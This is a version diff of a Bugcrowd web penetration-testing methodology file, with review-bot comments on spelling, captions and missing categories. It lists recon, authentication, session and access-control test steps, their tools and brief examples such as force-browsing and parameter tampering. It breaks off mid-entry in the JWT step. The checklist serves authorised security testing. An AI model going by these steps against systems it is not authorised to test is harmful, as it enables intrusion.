bmt 0.6.0 → 0.7.0

@@ -1,9 +1,9 @@
1
1
  {
2
2
  "metadata": {
3
3
  "title": "Website Testing",
4
- "release_date": "2021-05-31T00:00:00+00:00",
5
- "description": "Bugcrowd web methodology testing",
6
- "vrt_version": "10.0.1"
4
+ "release_date": "2025-04-24T00:00:00+00:00",
5
+ "description": "Bugcrowd Web Methodology Testing",
6
+ "vrt_version": "1.16"
7
7
  },
8
8
  "content": {
9
9
  "steps": [
@@ -17,74 +17,74 @@
17
17
  "key": "search_engine_discovery_and_reconnaissance",
18
18
  "title": "Conduct Search Engine Discovery and Reconnaissance for Information Leakage",
19
19
  "caption": "OTG-INFO-001, WAHHM - Recon and Analysis",
20
- "description": "Use a search engine to search for Network diagrams and Configurations, Credentials, Error message content.",
21
- "tools": "Google Hacking, Sitedigger, Shodan, FOCA, Punkspider",
20
+ "description": "Query search engines for leaked credentials, configurations, or documents via misindexing.",
21
+ "tools": "bbot, dorky, Censys, Google Dorks, Shodan",
22
22
  "vrt_category": "sensitive_data_exposure"
23
23
  },
24
24
  {
25
25
  "key": "fingerprint",
26
26
  "title": "Fingerprint Web Server",
27
27
  "caption": "OTG-INFO-002, WAHHM - Recon and Analysis",
28
- "description": "Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using 'HTTP header field ordering' and 'Malformed requests test.'",
29
- "tools": "Httprint, Httprecon, Desenmascarame",
28
+ "description": "Identify server, CMS, or database software and version to exploit CVEs or misconfigurations.",
29
+ "tools": "httpx, Nuclei, Wappalyzer",
30
30
  "vrt_category": "server_security_misconfiguration"
31
31
  },
32
32
  {
33
33
  "key": "webserver_metafiles",
34
34
  "title": "Review Webserver Metafiles for Information Leakage",
35
35
  "caption": "OTG-INFO-003, WAHHM - Recon and Analysis",
36
- "description": "Analyze robots.txt and identify <META> Tags from website.",
36
+ "description": "Check robots.txt, sitemap.xml and identify <META> Tags from website for exposed endpoints or directories.",
37
37
  "tools": "Browser, curl, wget"
38
38
  },
39
39
  {
40
40
  "key": "enumerate_applications",
41
41
  "title": "Enumerate Applications on Webserver",
42
42
  "caption": "if in scope OTG-INFO-004, WAHHM - Recon and Analysis",
43
- "description": "Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers",
44
- "tools": "Webhosting.info, dnsrecon, Nmap, fierce, Recon-ng, Intrigue"
43
+ "description": "Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers to expand the attack surface.",
44
+ "tools": "Amass, bbot, ffuf, gowitness, Subfinder"
45
45
  },
46
46
  {
47
47
  "key": "webpage_comments_and_metadata",
48
48
  "title": "Review Webpage Comments and Metadata for Information Leakage",
49
49
  "caption": "OTG-INFO-005, WAHHM - Recon and Analysis",
50
- "description": "Find sensitive information from webpage comments and Metadata on source code.",
51
- "tools": "Browser, curl, wget",
50
+ "description": "Analyze HTML and JavaScript for leaked API keys, credentials, or endpoints.",
51
+ "tools": "Browser, GitDorker, LinkFinder, TruffleHog",
52
52
  "vrt_category": "sensitive_data_exposure"
53
53
  },
54
54
  {
55
55
  "key": "application_entry_points",
56
56
  "title": "Identify application entry points",
57
57
  "caption": "OTG-INFO-006, WAHHM - Recon and Analysis",
58
- "description": "Identify from hidden fields, parameters, methods HTTP header analysis",
59
- "tools": "Burp proxy, ZAP, Tamper data"
58
+ "description": "Identify forms, APIs, or parameters for injection or logic vulnerabilities.",
59
+ "tools": "Arjun, Burp Suite (Param-miner), kiterunner"
60
60
  },
61
61
  {
62
62
  "key": "execution_paths",
63
63
  "title": "Map execution paths through application",
64
64
  "caption": "OTG-INFO-007, WAHHM - Recon and Analysis",
65
- "description": "Map the target application and understand the principal workflows.",
66
- "tools": "Burp proxy, ZAP"
65
+ "description": "Map application workflows to uncover hidden or unprotected routes.",
66
+ "tools": "Burp Suite, ffuf, Interlace, nuclei"
67
67
  },
68
68
  {
69
69
  "key": "fingerprint_webapp_framework",
70
70
  "title": "Fingerprint Web Application Framework",
71
71
  "caption": "OTG-INFO-008, WAHHM - Recon and Analysis",
72
- "description": "Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.",
73
- "tools": "Whatweb, BlindElephant, Wappalyzer"
72
+ "description": "Identify the web application framework or CMS by examining HTTP headers, cookies, source code, and specific file/folder structures for characteristic indicators.",
73
+ "tools": "BuiltWith, Burp Suite, httpx, Wappalyzer"
74
74
  },
75
75
  {
76
76
  "key": "fingerprint_webapp",
77
77
  "title": "Fingerprint Web Application",
78
78
  "caption": "OTG-INFO-009, WAHHM - Recon and Analysis",
79
79
  "description": "Identify the web application and version to determine known vulnerabilities and the appropriate exploits.",
80
- "tools": "Whatweb, BlindElephant, Wappalyzer"
80
+ "tools": "Nuclei, httpx, Wappalyzer"
81
81
  },
82
82
  {
83
83
  "key": "application_architecture",
84
84
  "title": "Map Application Architecture",
85
85
  "caption": "OTG-INFO-010, WAHHM - Recon and Analysis",
86
86
  "description": "Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database",
87
- "tools": "Browser, curl, wget"
87
+ "tools": "Censys, httpx, Shodan, wafw00f, Wappalyzer"
88
88
  }
89
89
  ]
90
90
  },
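Review bot: Tool names in the rewritten `tools` strings are not spelled consistently: `nuclei` on the `execution_paths` step versus `Nuclei` on `fingerprint` and `fingerprint_webapp` in this hunk, and `Subfinder` on `enumerate_applications` versus `subfinder` on the subdomain-takeover step in the next hunk; `Param-miner` likewise appears both inside `Burp Suite (Param-miner)` here and as a standalone entry in the authentication and authorization hunks. Because `tools` is a flat comma-separated string, any consumer that splits it to filter, count or deduplicate by tool will treat these as distinct tools. Pick one spelling per tool (e.g. `Nuclei`, `Subfinder`) and apply it across the whole file rather than per step.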
@@ -98,63 +98,103 @@
98
98
  "key": "network_and_infrastructure",
99
99
  "title": "Test Network/Infrastructure Configuration",
100
100
  "caption": "OTG-CONFIG-001, WAHHM - Recon and Analysis, Assess Application Hosting",
101
- "description": "Understand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.",
102
- "tools": "Nessus",
101
+ "description": "Assess infrastructure interactions and configuration management for software, backend DB servers, WebDAV, and FTP to uncover known vulnerabilities.",
102
+ "tools": "naabu, Nessus, Nmap, RustScan",
103
103
  "vrt_category": "server_security_misconfiguration"
104
104
  },
105
105
  {
106
106
  "key": "application_platform",
107
107
  "title": "Test Application Platform Configuration",
108
108
  "caption": "OTG-CONFIG-002, WAHHM - Recon and Analysis",
109
- "description": "Identify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.",
110
- "tools": "Browser, Nikto",
109
+ "description": "Testing application platform configuration involves identifying default installation paths, handling server errors, enforcing minimal privileges, and managing software logging.",
110
+ "tools": "Browser, ffuf, Nuclei",
111
111
  "vrt_category": "server_security_misconfiguration"
112
112
  },
113
113
  {
114
114
  "key": "file_extensions_handling",
115
115
  "title": "Test File Extensions Handling for Sensitive Information",
116
116
  "caption": "OTG-CONFIG-003, WAHHM - Recon and Analysis",
117
- "description": "Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)",
118
- "tools": "Browser, Nikto",
117
+ "description": "Locate crucial files and information with the following extensions: .asa, .inc, .sql, .zip, .tar, .pdf, .txt, and others.",
118
+ "tools": "Browser, ffuf",
119
119
  "vrt_category": "sensitive_data_exposure"
120
120
  },
121
121
  {
122
122
  "key": "backup_and_unreferenced_files",
123
123
  "title": "Backup and Unreferenced Files for Sensitive Information",
124
124
  "caption": "OTG-CONFIG-004, WAHHM - Recon and Analysis",
125
- "description": "Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename",
126
- "tools": "Nessus, Nikto, Wikto",
125
+ "description": "Examine JavaScript code, comments, cache, and backup files (.old, .bak, .inc, .src). Utilize filename guessing to discover additional files.",
126
+ "tools": "Browser, ffuf, gau, LinkFinder",
127
127
  "vrt_category": "sensitive_data_exposure"
128
128
  },
129
129
  {
130
130
  "key": "admin_interfaces",
131
131
  "title": "Enumerate Infrastructure and Application Admin Interfaces",
132
132
  "caption": "OTG-CONFIG-005, WAHHM - Recon and Analysis",
133
- "description": "Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)",
134
- "tools": "Burp Proxy, dirb, Dirbuster, fuzzdb, Tilde Scanner"
133
+ "description": "Perform directory and file enumeration. Extract comments and links from source code, specifically looking for administrative interfaces (e.g., /admin, /administrator, /backoffice, /backend). Investigate alternative server ports, such as Tomcat running on port 8080.",
134
+ "tools": "Burp Suite, ffuf, gau, kiterunner, LinkFinder"
135
135
  },
136
136
  {
137
137
  "key": "http_methods",
138
138
  "title": "Test HTTP Methods",
139
139
  "caption": "OTG-CONFIG-006, WAHHM - Test Handling of Access",
140
- "description": "Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST",
141
- "tools": "netcat, curl",
140
+ "description": "Probe risky HTTP methods (e.g., OPTIONS, TRACE, PUT) for unauthorized access.",
141
+ "tools": "Burp Suite, curl, ffuf",
142
142
  "vrt_category": "server_security_misconfiguration"
143
143
  },
144
144
  {
145
145
  "key": "http_transport_security",
146
146
  "title": "Test HTTP Strict Transport Security",
147
147
  "caption": "OTG-CONFIG-007, WAHHM - Test Handling of Access",
148
- "description": "Identify HSTS header on Web server through HTTP response header. curl -s -D- https://domain.com/ | grep Strict",
149
- "tools": "Burp Proxy, ZAP, curl",
148
+ "description": "Check the HTTP response headers from the web server to identify the presence and details of the Strict-Transport-Security (HSTS) header.",
149
+ "tools": "Browser, Burp Suite, curl",
150
150
  "vrt_category": "server_security_misconfiguration"
151
151
  },
152
152
  {
153
153
  "key": "ria_cross_domain_policy",
154
154
  "title": "Test RIA cross domain policy",
155
155
  "caption": "OTG-CONFIG-008, WAHHM - Test Handling of Access",
156
- "description": "Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.",
157
- "tools": "Burp Proxy, ZAP, Nikto",
156
+ "description": "Test crossdomain.xml and clientaccesspolicy.xml for permissive data access.",
157
+ "tools": "Burp Suite, curl, wget",
158
+ "vrt_category": "server_security_misconfiguration"
159
+ },
160
+ {
161
+ "key": "test_for_subdomain_takeover",
162
+ "title": "Test for Subdomain Takeover",
163
+ "caption": "OTG-CONFIG-010",
164
+ "description": "Exploit dangling DNS records for subdomain takeover.",
165
+ "tools": "Amass, bbot, dig, gowitness, subfinder",
166
+ "vrt_category": "server_security_misconfiguration"
167
+ },
168
+ {
169
+ "key": "test_cloud_storage",
170
+ "title": "Test Cloud Storage",
171
+ "caption": "OTG-CONFIG-011",
172
+ "description": "Check AWS S3 buckets, GCP Cloud Storage, and Azure Blob Storage for public data exposure.",
173
+ "tools": "awscli, Azure CLI, CloudFox, GCPBucketBrute, s3recon",
174
+ "vrt_category": "server_security_misconfiguration"
175
+ },
176
+ {
177
+ "key": "web_cache_deception",
178
+ "title": "Web Cache Deception",
179
+ "caption": "",
180
+ "description": "Cache sensitive pages as public resources via path manipulation.",
181
+ "tools": "Browser, Burp Suite (Param-miner), curl",
182
+ "vrt_category": "server_security_misconfiguration"
183
+ },
184
+ {
185
+ "key": "web_cache_poisoning",
186
+ "title": "Web Cache Poisoning",
187
+ "caption": "",
188
+ "description": "Poison CDN or service worker cache with malicious content.",
189
+ "tools": "Browser, Burp Suite (Param-miner), curl",
190
+ "vrt_category": "server_security_misconfiguration"
191
+ },
192
+ {
193
+ "key": "content_security_policy",
194
+ "title": "Testing Content Security Policy (CSP)",
195
+ "caption": "",
196
+ "description": "Assess the implementation of the Content Security Policy to ensure it effectively mitigates risks of cross-site scripting (XSS) and data injection attacks.",
197
+ "tools": "Burp Suite, CSP Evaluator, ZAP",
158
198
  "vrt_category": "server_security_misconfiguration"
159
199
  }
160
200
  ]
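Review bot: The five new steps use `"caption": ""` as a placeholder while every other step in the section carries an OTG reference, and the two new steps that do have one (`OTG-CONFIG-010`, `OTG-CONFIG-011`) drop the `WAHHM - …` suffix the rest of the file uses. An empty string is an ambiguous sentinel: a renderer cannot distinguish "no external reference exists" from "reference not filled in". Either omit `caption` on steps without a reference or keep it non-empty and in the section's format, e.g. `"caption": "OTG-CONFIG-010, WAHHM - Recon and Analysis"`; I cannot tell from the diff whether the consumer treats the key as required, so which option is safe depends on that. The same empty-caption pattern recurs in the authentication and session-management hunks.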
@@ -170,7 +210,7 @@
170
210
  "title": "Test Role Definitions",
171
211
  "caption": "OTG-IDENT-001, WAHHM - Test Handling of Access",
172
212
  "description": "Validate the system roles defined within the application by creating a permission matrix.",
173
- "tools": "Burp Proxy, ZAP",
213
+ "tools": "Browser, Burp Suite, ZAP",
174
214
  "vrt_category": "broken_access_control"
175
215
  },
176
216
  {
@@ -178,46 +218,46 @@
178
218
  "title": "Test User Registration Process",
179
219
  "caption": "OTG-IDENT-002, WAHHM - Test Handling of Access",
180
220
  "description": "Verify that the identity requirements for user registration are aligned with business and security requirements",
181
- "tools": "Burp Proxy, ZAP",
221
+ "tools": "Browser, Burp Suite, ZAP",
182
222
  "vrt_category": "server_security_misconfiguration"
183
223
  },
184
224
  {
185
225
  "key": "account_provisioning",
186
226
  "title": "Test Account Provisioning Process",
187
227
  "caption": "OTG-IDENT-003, WAHHM - Test Handling of Access",
188
- "description": "Determine which roles are able to provision users and what sort of accounts they can provision.",
189
- "tools": "Burp Proxy, ZAP"
228
+ "description": "Identify the roles with user provisioning capabilities and the permissible scope of the accounts they can provision.",
229
+ "tools": "Browser, Burp Suite, ZAP"
190
230
  },
191
231
  {
192
232
  "key": "guessable_user_accounts",
193
233
  "title": "Testing for Account Enumeration and Guessable User Account",
194
234
  "caption": "OTG-IDENT-004, WAHHM - Test Handling of Access",
195
- "description": "Generic login error statement check, return codes/parameter values, enumerate all possible valid user ids (Login system, Forgot password)",
196
- "tools": "Browser, Burp Proxy, ZAP",
235
+ "description": "Check login and forgot password mechanisms for generic error leakage and return code vulnerabilities, and attempt to enumerate valid users through direct methods or timing exploits.",
236
+ "tools": "Browser, Burp Suite, ZAP",
197
237
  "vrt_category": "server_security_misconfiguration"
198
238
  },
199
239
  {
200
240
  "key": "username_policy",
201
241
  "title": "Testing for Weak or unenforced username policy",
202
242
  "caption": "OTG-IDENT-005, WAHHM - Test Handling of Access",
203
- "description": "User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed.",
204
- "tools": "Browser, Burp Proxy, ZAP",
243
+ "description": "User account naming conventions often follow predictable patterns (e.g., initials and last name), making valid account names easily guessable.",
244
+ "tools": "Browser, Burp Suite, ZAP",
205
245
  "vrt_category": "server_security_misconfiguration"
206
246
  },
207
247
  {
208
248
  "key": "guest_accounts_permission",
209
249
  "title": "Test Permissions of Guest/Training Accounts",
210
250
  "caption": "OTG-IDENT-006, WAHHM - Test Handling of Access",
211
- "description": "Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorization process required for access. Evaluate consistency between access policy and guest/training account access permissions.",
212
- "tools": "Burp Proxy, ZAP",
251
+ "description": "Evaluate if guest and training account access permissions consistently align with the defined access policy.",
252
+ "tools": "Browser, Burp Suite, ZAP",
213
253
  "vrt_category": "server_security_misconfiguration"
214
254
  },
215
255
  {
216
256
  "key": "account_suspension_resumption",
217
257
  "title": "Test Account Suspension/Resumption Process",
218
258
  "caption": "OTG-IDENT-007, WAHHM - Test Handling of Access",
219
- "description": "Verify the identity requirements for user registration align with business/security requirements. Validate the registration process.",
220
- "tools": "Burp Proxy, ZAP",
259
+ "description": "Verify the alignment of user registration identity requirements with business and security needs, and subsequently validate the entire registration process.",
260
+ "tools": "Browser, Burp Suite, ZAP",
221
261
  "vrt_category": "server_security_misconfiguration"
222
262
  }
223
263
  ]
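Review bot: The reworded `description` on the `account_suspension_resumption` step still talks about user registration ("Verify the alignment of user registration identity requirements…"), which is the text of the "Test User Registration Process" step earlier in this hunk; the commit rephrases the copy-paste error instead of fixing it. The step's title is `Test Account Suspension/Resumption Process`, so the description should cover that, e.g. `"description": "Verify that account suspension and resumption follow the defined process, that suspended accounts cannot authenticate, and that existing sessions are invalidated when an account is suspended."`.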
@@ -233,23 +273,23 @@
233
273
  "title": "Testing for Credentials Transported over an Encrypted Channel",
234
274
  "caption": "OTG-AUTHN-001, WAHHM - Miscellaneous Tests",
235
275
  "description": "Check the referrer whether it’s HTTP or HTTPs. Sending data through HTTP and HTTPS.",
236
- "tools": "Burp Proxy, ZAP",
276
+ "tools": "Burp Suite, ZAP",
237
277
  "vrt_category": "broken_authentication_and_session_management"
238
278
  },
239
279
  {
240
280
  "key": "default_credentials",
241
281
  "title": "Testing for default credentials",
242
282
  "caption": "OTG-AUTHN-002, WAHHM - Test Handling of Access",
243
- "description": "Testing for default credentials of common applications, Testing for default password of new accounts.",
244
- "tools": "Burp Proxy, ZAP, Hydra",
283
+ "description": "Test for default credentials in common applications and default passwords assigned to new accounts.",
284
+ "tools": "Browser, Burp Suite, ZAP, Hydra",
245
285
  "vrt_category": "server_security_misconfiguration"
246
286
  },
247
287
  {
248
288
  "key": "lock_out_mechanism",
249
- "title": "Testing for Weak lock out mechanism",
289
+ "title": "Testing for Weak Lockout Mechanism",
250
290
  "caption": "OTG-AUTHN-003, WAHHM - Test Handling of Access",
251
- "description": "Evaluate the account lockout mechanism’s ability to mitigate brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.",
252
- "tools": "Browser",
291
+ "description": "Evaluate the strength of the account lockout against password guessing and the security of the account unlock process.",
292
+ "tools": "Browser, Burp Suite, ZAP, Hydra",
253
293
  "vrt_category": "server_security_misconfiguration"
254
294
  },
255
295
  {
@@ -257,47 +297,47 @@
257
297
  "title": "Testing for bypassing authentication schema",
258
298
  "caption": "OTG-AUTHN-004, WAHHM - Test Handling of Access",
259
299
  "description": "Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection",
260
- "tools": "Burp Proxy, ZAP",
300
+ "tools": "Arjun, Browser, Burp Suite, kiterunner, Param-miner, ZAP",
261
301
  "vrt_category": "broken_authentication_and_session_management"
262
302
  },
263
303
  {
264
304
  "key": "remember_password",
265
305
  "title": "Test remember password functionality",
266
306
  "caption": "OTG-AUTHN-005, WAHHM - Test Handling of Access",
267
- "description": "Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?",
268
- "tools": "Burp Proxy, ZAP",
307
+ "description": "Check application cookies for password storage (ensuring they are not in plaintext but hashed) and verify the autocomplete=off attribute on password fields.",
308
+ "tools": "Browser, Burp Suite, ZAP",
269
309
  "vrt_category": "broken_authentication_and_session_management"
270
310
  },
271
311
  {
272
312
  "key": "browser_cache",
273
313
  "title": "Testing for Browser cache weakness",
274
314
  "caption": "OTG-AUTHN-006, WAHHM - Miscellaneous Tests",
275
- "description": "Check browser history issues by clicking the 'Back' button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)",
276
- "tools": "Burp Proxy, ZAP, Firefox add-on CacheViewer2",
315
+ "description": "Test for browser history vulnerabilities after logout and examine HTTP response headers for proper cache control directives (e.g., Cache-Control: no-cache)",
316
+ "tools": "Browser, Burp Suite, ZAP, Firefox add-on CacheViewer2",
277
317
  "vrt_category": "server_security_misconfiguration"
278
318
  },
279
319
  {
280
320
  "key": "password_policy",
281
321
  "title": "Testing for Weak password policy",
282
322
  "caption": "OTG-AUTHN-007, WAHHM - Test Handling of Access",
283
- "description": "Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of Passwords.",
284
- "tools": "Burp Proxy, ZAP, Hydra",
323
+ "description": "Assess the application's resistance to dictionary-based brute-force attacks by evaluating password length, complexity, reuse restrictions, and aging requirements.",
324
+ "tools": "Browser, Burp Suite, ZAP, Hydra",
285
325
  "vrt_category": "insufficient_security_configurability"
286
326
  },
287
327
  {
288
328
  "key": "security_question",
289
329
  "title": "Testing for Weak security question/answer",
290
330
  "caption": "OTG-AUTHN-008, WAHHM - Test Handling of Access",
291
- "description": "Testing for weak pre-generated questions, Testing for weak self-generated questions, Testing for brute-forcible answers (Unlimited attempts?)",
292
- "tools": "Browser",
331
+ "description": "Test password reset questions for inherent weakness (pre-generated, self-generated) and susceptibility to brute-force attacks due to unlimited attempts.",
332
+ "tools": "Browser, Burp Suite, ZAP",
293
333
  "vrt_category": "broken_authentication_and_session_management"
294
334
  },
295
335
  {
296
336
  "key": "change_password",
297
337
  "title": "Testing for weak password change or reset functionalities",
298
338
  "caption": "OTG-AUTHN-009, WAHHM - Test Handling of Access",
299
- "description": "Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?",
300
- "tools": "Browser, Burp Proxy, ZAP",
339
+ "description": "Test password reset for plaintext password display, insecure email transmission, and missing random tokens, and assess password change for old password requirement and CSRF vulnerability.",
340
+ "tools": "Browser, Burp Suite, ZAP",
301
341
  "vrt_category": "broken_authentication_and_session_management"
302
342
  },
303
343
  {
@@ -305,7 +345,35 @@
305
345
  "title": "Testing for Weaker authentication in alternative channel",
306
346
  "caption": "OTG-AUTHN-010, WAHHM - Test Handling of Access",
307
347
  "description": "Understand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)",
308
- "tools": "Browser"
348
+ "tools": "Browser, Burp Suite, ZAP"
349
+ },
350
+ {
351
+ "key": "single_sign_on_misconfigurations",
352
+ "title": "Single Sign-On Misconfigurations",
353
+ "caption": "",
354
+ "description": "Exploit OAuth or OpenID Connect flaws (e.g., redirect URI tampering)",
355
+ "tools": "Browser, Burp Suite, ZAP"
356
+ },
357
+ {
358
+ "key": "testing_for_mfa",
359
+ "title": "Testing for 2FA/MFA",
360
+ "caption": "",
361
+ "description": "Attempt to bypass the implemented two-factor authentication to identify potential weaknesses.",
362
+ "tools": "Browser, Burp Suite, ZAP"
363
+ },
364
+ {
365
+ "key": "testing_for_password_reset_token",
366
+ "title": "Testing for Password Reset Token Exposure to Third-Party Domains",
367
+ "caption": "",
368
+ "description": "Check if password reset tokens are exposed to third-party domains via referrer headers or other methods.",
369
+ "tools": "Browser, Burp Suite, ZAP"
370
+ },
371
+ {
372
+ "key": "testing_for_reusable_password_reset_token",
373
+ "title": "Testing for Reusable Password Reset Tokens",
374
+ "caption": "",
375
+ "description": "Determine if password reset tokens can be used multiple times.",
376
+ "tools": "Browser, Burp Suite, ZAP"
309
377
  }
310
378
  ]
311
379
  },
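Review bot: The four new authentication steps (`single_sign_on_misconfigurations` through `testing_for_reusable_password_reset_token`) carry no `vrt_category`, while most neighbouring steps in this section map to one. If `vrt_category` is what downstream uses to map a finding onto the VRT, these steps cannot be categorised; `broken_authentication_and_session_management` is the value the surrounding steps use, so `"vrt_category": "broken_authentication_and_session_management"` after each `tools` line is the likely fix, though I cannot confirm from the diff that the key is mandatory. Separately, the SSO step's description lacks the terminal period its three siblings have, and the rewritten `bypass_schema` and `direct_object_reference` descriptions in the authorization hunk have the same inconsistency.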
@@ -319,32 +387,32 @@
319
387
  "key": "directory_traversal_and_file_include",
320
388
  "title": "Testing Directory traversal/file include",
321
389
  "caption": "OTG-AUTHZ-001, WAHHM - Test Handling of Input",
322
- "description": "dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.",
323
- "tools": "Burp Proxy, ZAP, Wfuzz",
390
+ "description": "Test for Dot-Dot-Slash (../), Directory Traversal, Local File Inclusion (LFI), and Remote File Inclusion (RFI) vulnerabilities.",
391
+ "tools": "Arjun, Burp Suite, ffuf, Param-miner, Wfuzz, ZAP",
324
392
  "vrt_category": "server_side_injection"
325
393
  },
326
394
  {
327
395
  "key": "bypass_schema",
328
396
  "title": "Testing for bypassing authorization schema",
329
397
  "caption": "OTG-AUTHZ-002, WAHHM - Test Handling of Access",
330
- "description": "Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)",
331
- "tools": "Burp Proxy (Authorize), ZAP",
398
+ "description": "Test for the ability to access resources without authentication, bypass Access Control Lists (ACLs), and perform forceful browsing to restricted areas (e.g., /admin/adduser.jsp)",
399
+ "tools": "Burp Suite (Authorize), ZAP",
332
400
  "vrt_category": "broken_access_control"
333
401
  },
334
402
  {
335
403
  "key": "privilege_escalation",
336
404
  "title": "Testing for Privilege Escalation",
337
405
  "caption": "OTG-AUTHZ-003, WAHHM - Test Handling of Access",
338
- "description": "Testing for role/privilege manipulates the values of hidden variables. Change some param groupid=2 to groupid=1",
339
- "tools": "Burp Proxy (Authorize), ZAP",
406
+ "description": "Escalate privileges via parameter tampering or logic flaws.",
407
+ "tools": "Burp Suite (Authorize), ZAP",
340
408
  "vrt_category": "broken_authentication_and_session_management"
341
409
  },
342
410
  {
343
411
  "key": "direct_object_reference",
344
412
  "title": "Testing for Insecure Direct Object References",
345
413
  "caption": "OTG-AUTHZ-004, WAHHM - Test Handling of Access",
346
- "description": "Force changing parameter value (?invoice=123 -> ?invoice=456)",
347
- "tools": "Burp Proxy (Authorize), ZAP",
414
+ "description": "Access objects by manipulating identifiers (e.g., user IDs)",
415
+ "tools": "Burp Suite (Authorize), ZAP",
348
416
  "vrt_category": "broken_access_control"
349
417
  }
350
418
  ]
@@ -359,8 +427,8 @@
359
427
  "key": "bypass_schema",
360
428
  "title": "Testing for Bypassing Session Management Schema",
361
429
  "caption": "OTG-SESS-001, WAHHM - Test Handling of Access",
362
- "description": "SessionID analysis prediction, unencrypted cookie transport, brute-force.",
363
- "tools": "Burp Proxy, ForceSSL, ZAP, CookieDigger",
430
+ "description": "Predictable SessionIDs transmitted without encryption expose a vulnerability to interception and potential brute-force attacks, leading to authentication bypass.",
431
+ "tools": "Browser, Burp Suite, ZAP",
364
432
  "vrt_category": "broken_authentication_and_session_management"
365
433
  },
366
434
  {
@@ -368,7 +436,7 @@
368
436
  "title": "Testing for Cookies attributes",
369
437
  "caption": "OTG-SESS-002, WAHHM - Test Handling of Access",
370
438
  "description": "Check HTTPOnly and Secure flag expiration, inspect for sensitive data.",
371
- "tools": "Burp Proxy, ZAP",
439
+ "tools": "Browser, Burp Suite, ZAP",
372
440
  "vrt_category": "server_security_misconfiguration"
373
441
  },
374
442
  {
@@ -376,31 +444,31 @@
376
444
  "title": "Testing for Session Fixation",
377
445
  "caption": "OTG-SESS-003, WAHHM - Test Handling of Access",
378
446
  "description": "The application doesn't renew the cookie after a successful user authentication.",
379
- "tools": "Burp Proxy, ZAP",
447
+ "tools": "Burp Suite, ZAP",
380
448
  "vrt_category": "broken_authentication_and_session_management"
381
449
  },
382
450
  {
383
451
  "key": "exposed_variables",
384
452
  "title": "Testing for Exposed Session Variables",
385
453
  "caption": "OTG-SESS-004, WAHHM - Test Handling of Access",
386
- "description": "Encryption & Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?",
387
- "tools": "Burp Proxy, ZAP",
454
+ "description": "Unencrypted and reused session tokens sent via GET requests expose sessions to easy interception and hijacking.",
455
+ "tools": "Burp Suite, ZAP",
388
456
  "vrt_category": "broken_authentication_and_session_management"
389
457
  },
390
458
  {
391
459
  "key": "csrf",
392
460
  "title": "Testing for Cross Site Request Forgery",
393
461
  "caption": "OTG-SESS-005, WAHHM - Test Handling of Access",
394
- "description": "URL analysis, Direct access to functions without any token.",
395
- "tools": "Burp Proxy (csrf_token_detect), burpy, ZAP",
462
+ "description": "Predictable URLs combined with missing CSRF tokens allow attackers to directly trigger actions on behalf of logged-in users.",
463
+ "tools": "Burp Suite, ZAP",
396
464
  "vrt_category": "cross_site_request_forgery_csrf"
397
465
  },
398
466
  {
399
467
  "key": "logout",
400
468
  "title": "Testing for logout functionality",
401
469
  "caption": "OTG-SESS-006, WAHHM - Test Handling of Access",
402
- "description": "Check reuse session after logout both server-side and SSO.",
403
- "tools": "Burp Proxy, ZAP",
470
+ "description": "Verify session invalidation server-side and across SSO after logout to prevent reuse.",
471
+ "tools": "Burp Suite, ZAP",
404
472
  "vrt_category": "broken_authentication_and_session_management"
405
473
  },
406
474
  {
@@ -408,16 +476,40 @@
408
476
  "title": "Test Session Timeout",
409
477
  "caption": "OTG-SESS-007, WAHHM - Test Handling of Access",
410
478
  "description": "Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.",
411
- "tools": "Burp Proxy, ZAP",
479
+ "tools": "Burp Suite, ZAP",
412
480
  "vrt_category": "broken_authentication_and_session_management"
413
481
  },
414
482
  {
415
483
  "key": "puzzling",
416
484
  "title": "Testing for Session puzzling",
417
485
  "caption": "OTG-SESS-008, WAHHM - Test Handling of Access",
418
- "description": "The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.",
486
+ "description": "Reusing session variables for multiple purposes allows attackers to manipulate application flow by accessing pages in unintended sequences.",
419
487
  "tools": "Burp Proxy, ZAP",
420
488
  "vrt_category": "broken_authentication_and_session_management"
489
+ },
490
+ {
491
+ "key": "concurrent",
492
+ "title": "Test for Concurrent Sessions",
493
+ "caption": "",
494
+ "description": "Check how the application manages multiple active sessions for the same account. Ensure it prevents risks like session hijacking and improper session handling.",
495
+ "tools": "Browser, Burp Suite, ZAP",
496
+ "vrt_category": "broken_authentication_and_session_management"
497
+ },
498
+ {
499
+ "key": "permission",
500
+ "title": "Test for Session Validity After Permission Change",
501
+ "caption": "",
502
+ "description": "Check if sessions remain valid when user permissions are changed.",
503
+ "tools": "Browser, Burp Suite, ZAP",
504
+ "vrt_category": "broken_authentication_and_session_management"
505
+ },
506
+ {
507
+ "key": "json_web_token",
508
+ "title": "JSON Web Token (JWT) Attacks",
509
+ "caption": "",
510
